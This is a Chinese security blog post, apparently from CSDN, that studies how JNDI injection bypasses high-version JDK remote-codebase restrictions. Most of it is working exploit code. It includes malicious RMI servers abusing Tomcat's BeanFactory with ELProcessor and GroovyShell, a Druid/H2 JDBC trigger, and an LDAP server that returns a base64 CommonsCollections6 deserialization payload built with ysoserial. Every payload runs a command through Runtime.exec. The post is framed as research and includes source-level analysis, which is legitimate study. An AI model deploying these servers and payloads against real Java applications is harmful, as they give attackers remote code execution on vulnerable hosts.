『Java安全』绕过JDK高版本限制进行JNDI注入学习研究

已于 2022-02-24 16:32:16 修改
阅读量2.6k 收藏 3
点赞数
分类专栏: # JNDI注入 文章标签: java jndi注入 web安全 rce 命令执行
于 2022-02-22 21:44:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/123039821
版权

文章目录

前言

Java版本8u261

常见绕过的类型

对于JDK版本11.0.1、8u191、7u201、6u211及以上,RMI和LDAP的trustURLCodebase已经被限制,但是还存在几种方法绕过

  1. 使用受害者本地的类作为恶意Reference Factory攻击RMI
  2. 利用LDAP返回序列化数据触发Gadget

一、寻找本地的类作为恶意工厂攻击RMI

JNDI基础篇提到:对象工厂需要实现javax.naming.spi.ObjectFactory接口的getObjectInstance方法,使用IDEA ctrl+H获取子类
在这里插入图片描述
tomcat-catalina.jar中org.apache.naming.factory.BeanFactory正好符合

探究BeanFactory类

        <!-- https://mvnrepository.com/artifact/org.apache.tomcat/tomcat-catalina -->
        <dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-catalina</artifactId>
            <version>8.5.3</version>
        </dependency>

BeanFactory恰好有getObjectInstance(),首先获取传入Reference类的className属性,然后调用无参数的构造方法实例化所指向的类
在这里插入图片描述
实例化成功后,获取Reference的forceString参数,这里类型转换为String,然后按照逗号分割成String数组
在这里插入图片描述
然后对于每一个数组元素:判断是否包含等号,如果包含等号:等号后面作为propName、等号前面作为param(注意这里substring的范围不要看反了);如果没有等号那么加set。

然后向空hashmap添加项目,键为param 值为beanClass中名称是propName的方法
在这里插入图片描述
之后反射调用forced中的方法,这里propName是上面的param,传入的参数是Reference属性名param对应的值。
在这里插入图片描述
不方便理解的话,这里举个例子:forceString赋值a=eval,Reference里面有一个属性a的值是print(),那么最终就会调用beanClass的eval方法,然后传入的参数是字符串print()。

那么接下来就要找到可以RCE的类

Poc

1、javax.el.ELProcessor

		<!-- https://mvnrepository.com/artifact/org.apache.tomcat.embed/tomcat-embed-el -->
		<dependency>
		    <groupId>org.apache.tomcat.embed</groupId>
		    <artifactId>tomcat-embed-el</artifactId>
		    <version>8.5.3</version>
		</dependency>

这个类中Tomcat依赖里面,可以通过传参实现RCE
在这里插入图片描述
根据上面的分析编写rmiServer端

package JNDIInjection.HighVer.LocalClass;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;
import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class BeanFactoryRMIServer {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1099);
        ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        resourceRef.add(new StringRefAddr("forceString", "a=eval"));
        
        resourceRef.add(new StringRefAddr("a", "Runtime.getRuntime().exec(\"calc\")"));
//        resourceRef.add(new StringRefAddr("a", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")"));
        
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(resourceRef);
        registry.bind("el", referenceWrapper);
        System.out.println("rmi://127.0.0.1:1099/el");
    }
}

如果要多次执行就可以用逗号分隔forceString

resourceRef.add(new StringRefAddr("forceString", "a=eval,b=eval"));

resourceRef.add(new StringRefAddr("a", "Runtime.getRuntime().exec(\"control\")"));
resourceRef.add(new StringRefAddr("b", "Runtime.getRuntime().exec(\"calc\")"));
代码审计

lookup的过程与普通rmi原理一致,直接来到com.sun.jndi.rmi.registry.RegistryContext的decodeObject方法

ResourceRef传给了var8,然后进行是否开启trustURLCodebase的判断
在这里插入图片描述
这里由于三个条件是and关系,一个为假就可以绕过。注意getFactoryClassLocation参数,创建ResourceRef的时候就赋值为空所以可以绕过
在这里插入图片描述
在这里插入图片描述
绕过if来到通过对象工厂实例化对象的函数,这里也跟普通rmi原理一样的
在这里插入图片描述
来到BeanFactory
在这里插入图片描述
新建ELProcessor实例,并且获取forceString字段
在这里插入图片描述
拆分字段,保存键值对
在这里插入图片描述
在这里插入图片描述
遍历Addr,获取到最后一项元素也就是我们自创的键a
在这里插入图片描述
invoke哈希表中键a对应的函数,传参是Addr中属性a对应的字符串值(注意这里出现了两个a)
在这里插入图片描述
之后就是eval了,不再赘述

调用栈

在这里插入图片描述

2、Groovy.lang.GroovyShell

如果有Groovy环境可以使用,调用GroovyShell.evaluate()

        <!-- https://mvnrepository.com/artifact/org.codehaus.groovy/groovy-all -->
        <dependency>
            <groupId>org.codehaus.groovy</groupId>
            <artifactId>groovy-all</artifactId>
            <version>1.5.0</version>
        </dependency>

package JNDIInjection.HighVer.LocalClass.BeanFactory;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;

import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import groovy.lang.GroovyShell;

public class GroovyAllRMIServer {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1099);
        ResourceRef resourceRef = new ResourceRef("groovy.lang.GroovyShell", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
        resourceRef.add(new StringRefAddr("forceString", "a=evaluate"));

        resourceRef.add(new StringRefAddr("a", "'calc'.execute()"));
        
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(resourceRef);
        registry.rebind("groovy", referenceWrapper);
        System.out.println("rmi://127.0.0.1:1099/groovy");
    }
}

3、其他

其他RCE利用Poc可以查阅浅蓝师傅的总结,见引用参考

*DruidDataSourceFactory类

(这里只做简单记录,是复现另一个师傅的方法)

		<!-- https://mvnrepository.com/artifact/com.alibaba/druid -->
		<dependency>
		    <groupId>com.alibaba</groupId>
		    <artifactId>druid</artifactId>
		    <version>1.0.15</version>
		</dependency>

代码审计

在这里插入图片描述
getObjectInstance最下面创建了数据源

创建数据源之前进行了配置,config()应该就是获取数据的过程
在这里插入图片描述
里面有个init来判断是否进行初始化
在这里插入图片描述
init()发起了数据库连接
在这里插入图片描述

在这里插入图片描述

PoC

package JNDIInjection.HighVer.LocalClass.DruidDataSourceFactory;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class DruidJDBCRMIServer {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1089);
        Reference ref = new Reference("javax.sql.DataSource","com.alibaba.druid.pool.DruidDataSourceFactory",null);
        String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
                "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
                "java.lang.Runtime.getRuntime().exec('calc')\n" +
                "$$\n";
        String JDBC_USER = "root";
        String JDBC_PASSWORD = "password";

        ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
        ref.add(new StringRefAddr("url",JDBC_URL));
        ref.add(new StringRefAddr("username",JDBC_USER));
        ref.add(new StringRefAddr("password",JDBC_PASSWORD));
        ref.add(new StringRefAddr("initialSize","1"));
        ref.add(new StringRefAddr("init","true"));
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);

        registry.bind("druid", referenceWrapper);
        System.out.println("rmi://127.0.0.1/druid is working...");
    }
}

二、LDAP + 反序列化RCE

原理

低版本LDAP通过返回恶意类完成RCE,而高版本ban了远程类加载。

LDAP有一个特殊的字段javaSerializedData,只要设置了它便会给Client端返回序列化串然后被反序列化,只要稍加修改即可绕过版本限制

    private static class OperationInterceptor extends InMemoryOperationInterceptor {
        @Override
        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String base = result.getRequest().getBaseDN();

            Entry entry = new Entry(base);
            entry.addAttribute("javaClassName", "xxx");
            
            try {
                entry.addAttribute("javaSerializedData", "rO0yy");
                result.sendSearchEntry(entry);
                result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
            }catch (Exception e){
                e.printStackTrace();
            }
        }
    }

javaSerializedData会发送到受害者机器上完成反序列化

PoC

最常用的反序列化RCE就是cc链了,先用ysoserial生成,由于特殊字符要b64一下,直接参考seebug用cc6

java -jar ysoserial.jar CommonsCollections6 "calc"|base64

解码放入entry即可

package JNDIInjection.HighVer.SerializeLdap;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import com.unboundid.util.Base64;

import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.net.InetAddress;

public class SerializeLdapServer {
    public static void main(String[] args) throws Exception {
        InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig("dc=example,dc=com");
        config.setListenerConfigs(new InMemoryListenerConfig(
                "listen",
                InetAddress.getByName("127.0.0.1"),
                389,
                ServerSocketFactory.getDefault(),
                SocketFactory.getDefault(),
                (SSLSocketFactory) SSLSocketFactory.getDefault()
        ));
        config.addInMemoryOperationInterceptor(new OperationInterceptor());
        InMemoryDirectoryServer directoryServer = new InMemoryDirectoryServer(config);
        directoryServer.startListening();
        System.out.println("ldap://127.0.0.1:389 is working...");
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {
        @Override
        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String base = result.getRequest().getBaseDN();

            Entry entry = new Entry(base);
            entry.addAttribute("javaClassName", "hahaha");
            
            try {
                entry.addAttribute("javaSerializedData", Base64.decode("rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRv" +
                        "cmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznB" +
                        "H9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4" +
                        "cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSC" +
                        "nnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5z" +
                        "Zm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFp" +
                        "bmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUv" +
                        "Y29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9u" +
                        "cy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hl" +
                        "LmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGU" +
                        "AgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBz" +
                        "cgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zv" +
                        "cm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5h" +
                        "bWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNz" +
                        "O3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1" +
                        "cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsA" +
                        "AAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAA" +
                        "AnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAA" +
                        "AAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAA" +
                        "AAF0AARjYWxjdAAEZXhlY3VxAH4AGwAAAAFxAH4AIHNxAH4AD3NyABFqYXZhLmxhbmcuSW50ZWdl" +
                        "chLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAB" +
                        "c3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xk" +
                        "eHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg="));
                result.sendSearchEntry(entry);
                result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
            }catch (Exception e){
                e.printStackTrace();
            }
        }
    }
}

在这里插入图片描述

代码审计

追了好几个lookup,到了PartialCompositeContext.class,在这个for循环完成反序列化RCE的
在这里插入图片描述
接着来到ComponentContext.class,又是一个lookup
在这里插入图片描述
LdapCtx.class,这里var4是LDAP服务的entry,第二个属性非空也就是JavaClassName非空即可进入decodeObject

在这里插入图片描述
在这里插入图片描述

来到Obj.class,var1是javaSerializedData属性,如果非空就进行反序列化
在这里插入图片描述
配合cc6就完成了RCE
在这里插入图片描述

调用栈

在这里插入图片描述

引用参考

如何绕过高版本 JDK 的限制进行 JNDI 注入利用
探索高版本 JDK 下 JNDI 漏洞的利用方法
JNDI jdk高版本绕过—— Druid

欢迎关注我的CSDN :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123039821
版权声明:如无特别声明,本文即为原创,转载时须注明出处及本声明

Ho1aAs
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java jdk 8 帮助文档 中文 文档 chm 谷歌翻译
04-02
JDK1.8 API 中文谷歌翻译版 java帮助文档 JDK API java 帮助文档 谷歌翻译 JDK1.8 API 中文 谷歌翻译版 java帮助文档 Java最新帮助文档 本帮助文档是使用谷歌翻译,非人工翻译。准确性不能保证,请与英文版配合使用 文件打开空白 右键文件属性 解除锁定
java项目jar包与jdk版本不兼容的问题解决
08-25
主要介绍了java项目jar包与jdk版本不兼容的问题解决,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Java代码审计】JNDI+RMI绕过版本JDK限制
最新发布
大河之犬的博客
03-08 820
传入的 Reference为 ResourceRef 类,后面通过反射的方式实例化 Reference 所指向的任意 Bean Class,调用 setter 方法为所有的属性赋值,该 Bean Class 的类名、属性、属性值,全都来自于 Reference 对象。因此,实际上我们可以调用任意指定类的任意方法,并指定单个可控的参数。因此,我们实际上可以指定一个存在于目标 classpath 中的工厂类名称,交由这个工厂类去实例化实际的目标类(即引用所指向的类),从而间接实现一定的代码控制。
jdk8全版本 java8全版本 JDK8全版本.zip
05-28
jdk8全版本 java8全版本
浅谈JAVA版本号的问题 Java版本号与JDk版本
08-24
主要介绍了浅谈JAVA版本号的问题 Java版本号与JDk版本,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
解决HTTPS访问问题(jdk版本过低和证书未安装至应用服务器内)
qq_36836224的博客
08-05 1657
本地jdk环境为1.7,访问HTTPS正常,部署到生产环境报Connect Rest错误,多方检查原来正式环境为jdk6,去访问别人的https时报错,下面是通过百度整理的解决方案; 首先要自己重写SSLSocketFactory这个类, 下面是自己重写的这个 package com.mln.frame; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.DataOut
Java JDK11(Java11)中设置HttpClient允许不安全的HTTPS连接
weixin_42098295的博客
05-23 1127
我的tomcat服务器设置为使用自签名(因此,不受信任)证书使用SSL。有时也需要允许不安全的HTTPS连接,例如在一些与其它站点一起使用的Web爬行应用程序中。我在以前的HttpsURLConnection API中,之前的解决方案:设置URLConnection允许不安全Https连接,最近被JDK 11中的有了新HttpClient API。下面分享一下设置方法。 原文地址:Java JDK11(Java11)中设置HttpClient允许不安全的HTTPS连接 ...
JNDI注入--Log4j漏洞--Fastjson反序列化漏洞
weixin_74985952的博客
09-21 267
Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
使用groovy和jdk9以上的版本配合使用
热门推荐
离离原上草,一岁一枯荣,野火烧不尽,春风吹又生。
05-22 1万+
在groovy的官方文档中,groovy3是最版本,最支持到jdk1.8,如果使用jdk10的话,安装groovy后或出现警告: WARNING: An illegal reflective access operation has occurred WARNING: Illegal reflective access by org.codehaus.groovy.reflection.C...
java跳过https_Java跳过Https安全Get或Post访问
weixin_34050521的博客
03-01 198
为了方便以后使用,记录一下。一、证书信任管理器/*** MyX509TrustManager.java 2013-11-29** Copyright(c) 2000-2013 Rain, All Rights Reserved.*/package com.rain.weixin.util;import java.security.cert.CertificateException;import...
JNDI注入利用原理及绕过版本JDK限制
mole_exp的博客
11-07 7047
文章目录前言JNDI 101什么是JNDI使用JNDI的好处几个简单的JNDI代码示例1、使用JNDI操作RMI2、使用JNDI操作LDAPJNDI动态协议转换JNDI Naming ReferencesJNDI 注入利用RMI向量LDAP向量其他向量绕过版本JDK限制方式1、利用本地Class作为JNDI Reference Factory方式2、LDAP Server返回序列化数据,触发本地反序列化Gadget坑Reference 前言 关于JNDI注入的讨论和研究,起源于国外的安全研究员@pwnte
JAVA加密安全手册JDK11版本 原版.pdf
08-27
没有积分的可以去下原版https://docs.oracle.com/en/java/javase/11/security/java-cryptography-architecture-jca-reference-guide.html____________JDK11 security java-cryptography-architecture-jca-reference-guide __________________________________不要忘记收藏一下
ref 能否注入为null_如何绕过版本JDK限制进行JNDI注入利用
weixin_39783633的博客
12-15 774
//写在前面//Java JNDI注入有很多种不同的利用方式,而这些利用方式的Payload分别有一些限制。在之前《深入理解JNDI注入Java反序列化漏洞利用》中,我们主要讨论的是通过RMI服务返回 JNDI Naming Reference Payload 的攻击手法,除此之外还有 RMI Remote Object Payload、LDAP Naming Reference Pa...
JDK1.8安装Derby数据库
maniaccccll的博客
06-04 948
JDK1.8安装Derby数据库
[Java安全]绕过版本JDKJNDI注入学习
feng的博客
03-01 866
[Java安全]绕过版本JDKJNDI注入学习 前言 接近2个月没有更新博客了,并不是自己在学什么东西,而是玩了整个寒假。。。因为去年的一些事情,导致现在的自己很颓废,但是毕竟是开学了,还是要慢慢学习了。 基本方法 找到一个受害者本地CLASSPATH中的类作为恶意的Reference Factory工厂类,并利用这个本地的Factory类执行命令。 利用LDAP直接返回一个恶意的序列化对象,JNDI注入依然会对该对象进行反序列化操作,利用反序列化Gadget完成命令执行。 这两种方式都非常依赖受害
绕过版本JDK限制JNDI注入
weixin_45682070的博客
01-21 1617
前言 JNDI_RMI在JDK 6u132, JDK 7u122, JDK 8u113版本中,系统属性 com.sun.jndi.rmi.object.trustURLCodebase;com.sun.jndi.cosnaming.object.trustURLCodcbase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。 JNDI_LDAP在Oracle JDK 6u211、7u201、8u191、11.0.1、之后 com.sun.jndi.ldap.obj
JNDI注入版本绕过学习
why811的博客
09-06 157
JNDI(Java Naming and Directory Interface)是一个应用程序设计的 API,一种标准的 Java 命名系统接口。JNDI 提供统一的客户端 API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将 JNDI API 映射为特定的命名服务和目录系统,使得 Java 应用程序可以和这些命名服务和目录服务之间进行交互。
url上接收到 el表达式 不渲染_JSP Webshell那些事 -- 攻击篇(上)
weixin_39938875的博客
11-22 283
前言目前很多大型厂商都选择使用Java进行Web项目的开发,近年来随着各种JAVA指定环境RCE漏洞的出现,Java Web安全逐渐被人们所重视,与漏洞相关的还有用于后期维持权限的Webshell。与PHP不同的是,JSP的语言特性较为严格,属于强类型语言,并且在JDK9以前并没有所谓的eval函数。一般而言JSP的变形免杀较为困难,但是依旧存在很多的"黑魔法"。不知攻,焉知防。阿里云安骑士We...
tomcat下jdk版本JNDI注入解析
b1ackc4t的博客
03-12 485
前言 经典的JNDI注入jdk8u191以上的版本默认被限制了加载远程工厂类,但可以通过加载一些特殊的本地工厂,达到执行命令的效果 比如常见的tomcat依赖里的BeanFactory就能实现类似的效果 经典payload 服务端 package org.example.rmi; import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.NamingException; import javax.naming.Refe
java版本jdk版本区别
06-06
Java版本JDK 版本之间存在一些区别。 Java版本通常用于表示到目前为止发布的 Java 语言版本,这些版本Java语言规范定义。Java SE 8,Java SE 11等都是 Java版本的例子。Java版本包括标准库、语言和虚拟机。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值